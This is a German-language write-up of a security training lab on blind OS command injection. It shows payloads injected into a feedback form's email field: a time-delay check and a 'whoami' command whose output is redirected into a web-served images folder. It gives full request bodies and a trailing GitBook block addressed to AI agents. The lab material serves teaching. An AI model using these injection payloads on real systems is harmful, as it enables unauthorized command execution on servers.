> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/command-injection/blind-os-command-injection-with-output-redirection.md).

# Blinde OS-Befehlsinjektion mit Ausgabeumleitung

### Blinde OS-Befehlsinjektion mit Ausgabeumleitung

#### Lab-Beschreibung

* Die Anwendung weist eine Schwachstelle für die Injektion von Systembefehlen auf **blind** in der Feedback-Funktionalität.
* Benutzereingabedaten werden in einen Shell-Befehl auf Serverseite eingeschleust.
* Die Ausgabe dieses Befehls wird \*\*nicht direkt zurückgegeben\*\* in der HTTP-Antwort.
* Es gibt jedoch einen zugänglichen Schreibpfad:/ `/var/www/images/`
* Die Anwendung liefert die Katalogbilder aus, die aus diesem Verzeichnis erzeugt werden.
* Also können wir **die Ausgabe umleiten** des Befehls in eine Datei in diesem Ordner und diese Datei dann über die URL zum Laden des Bildes lesen.

**Lab-Ziel:** Führe den `whoami` Befehl aus und stelle seine Ausgabe wieder her.

```bash
;sleep 10;
```

#### Injektionserkennung (Zeitverzögerung)

Das Feedback-Formular wird verwendet. / Das **E-Mail** Feld ist verwundbar: Wenn du eine Verzögerung injizierst, dauert die Antwort etwa 10 Sekunden.

In den `E-Mail` Feld injizierte Nutzlast:

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;sleep 10;&subject=hello&message=hello1234
```

{% endcode %}

Die 10-sekündige Verzögerung bestätigt die Befehlsinjektion.

#### Operation mit Ausgabeumleitung

Zweck: leite die Ausgabe von `whoami` in eine Datei in `/var/www/images/`.

In den `E-Mail` Feld injizierte Nutzlast:

```
;whoami > /var/www/images/test.txt;
```

Beispiel für einen Request-Body:

{% code overflow="wrap" %}

```bash
csrf=3dBtfZovWVNJXDv2aXCkmfAOSH9tQt7h&name=hello&email=hello%40gmail.com;whoami > /var/www/images/test.txt;&subject=hello&message=hello1234
```

{% endcode %}

Dieser Befehl erstellt (oder überschreibt) die `test.txt` Datei im aus dem Web zugänglichen Verzeichnis.

```bash
/image?filename=test.txt
```

#### Wiederherstellung des Ergebnisses

Um die Ausgabe von `whoami` zu lesen, die in der Datei gespeichert wurde, rufen wir die URL auf, die die Dateien im Bildordner bereitstellt:

<figure><img src="/files/a1c9f40d873446c7a07285a3b011ff126ef5d7ee" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/command-injection/blind-os-command-injection-with-output-redirection.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
